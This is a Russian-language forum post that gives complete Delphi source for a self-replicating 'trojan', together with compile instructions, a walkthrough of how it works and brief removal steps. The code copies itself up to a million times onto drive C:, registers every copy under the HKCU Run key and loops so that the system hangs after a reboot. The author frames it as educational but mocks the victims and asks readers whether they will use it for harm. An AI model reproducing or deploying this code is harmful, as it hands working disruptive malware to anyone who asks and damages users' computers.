Пример вирусного кода на Delphi
Сначало администрации и модерации сайта. Прошу не удалять Данный вопрос так как он служит исключительно для изучения и обучения языка программирования, а так же для подавления интереса!! !
Я не несу ответственности за использование данного кода в злых намерениях. Использование во вред данного кода без моего согласия будет строго наказано!)) )
Здравствуйте. Хочу дать ламерам которые ни как не угомонятся спрашивать одни и те же вопросы "Как написать Вирус". И во первых наша программа будет скорее трояном, но красть данные она не будет, а будет делать наоборот, мучать систему!!!) )
Для начало разберемся где будем это компилировать.
Среда разработки: Borland Delphi 7
Скачали, установили? ( если нету )
Теперь:
1) Открываем вкладку File > New > Other > Console Application
2) Далее удаляем все, что там написанно и вставляем ниже приведенный код!) )
program Project2;
uses
Windows,
SysUtils,
Registry;
var
Virus:array[0..260] of Char;
i,q,w :integer;
ch,p:pansiChar;
D:string;
chr:char;
str:string;
st:AnsiString;
Reg:tregistry;
begin
GetModuleFileName(0, Virus, SizeOf(Virus));
repeat
For i:=1 to 1000000 do
begin
st:=inttostr(i);
str:='C:\Ti_eto_ne_ydalish'+st+'.exe';
p:=pansichar(str);
CopyFile(Virus,p, True);
reg := TRegistry.Create;
reg.RootKey := HKEY_CURRENT_USER;
reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run', True);
reg.WriteString(st, 'C:\Ti_eto_ne_ydalish'+st+'.exe');
reg.closekey;
reg.RootKey := HKEY_CURRENT_USER;
reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\RunOnce', True);
end;
until i=1000001;
end;
end.
Жмем CTRL+S и выбираем куда сохранить исходник, далее жмем Project > Build Project и туда где вы сохранили исходный код троянца появится *.exe файл с таким же названием как и исходный код троянца, это и есть исполняемый файл трояна.
Далее разберемся с алгоритмом:
1) Создает лимон копий вируса на диске C:\ ( если диска C:\ нету не заработает )
2) Прописывает свои копии в автозапуске в 2 ключа реестра
3) Повторяет цикл
Далее разберемся как это работает детально:
1) Вредоносное ПО получает путь к самому себе
2) Запускается цикл в 1 миллион итераций
3) Создается первая копия вируса на диске C:\ с названием Ti_eto_ne_ydalish1.exe
4) Копия на диске C:\Ti_eto_ne_ydalish1.exe добавляется в автозапуск по путям:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
5) Создается вторая копия на диске C: с названием Ti_Eto_Ne_Ydalish2.exe
6) Вторая копия записывается в реестр
7) Создается 3 копия и записывается в реестр и так до 1 миллиона копий
8) Цикл в 1 миллион итераций повторяется вновь, что мешает удалению копий.
9) Испуганный юзер скорее всего в 30% заметит вирус и только в 3% догадается включить диспечер и отключить процесс после чего удалять копии, а в остальных процентах испугано перезагрузит компьютер
10) После перезапуска компьютера все копии трояна одновременно запускаются и начинают делать то, что и первый наш троян, ДА ДА! ! Вылетает множество системных ошибок и Операционная Система Зависает.
Как лечить:
1) Запустить систему в безопасном режиме.
2) Открыть реестр через командную строку ( cmd.exe ) и ввести regedit откроется реестр
3) удалить ключи автозапуска по путям:
Ключей будет столько же сколько и копий
4) Удалить копии трояна на диске C:
5) Перезагрузить компьютер и запустить уже в нормальном режиме.
Как не попасться на данный троян: Иметь хороший антивирус.
Теперь не большой опросик в конце поста:
Будете вы использовать это во вред?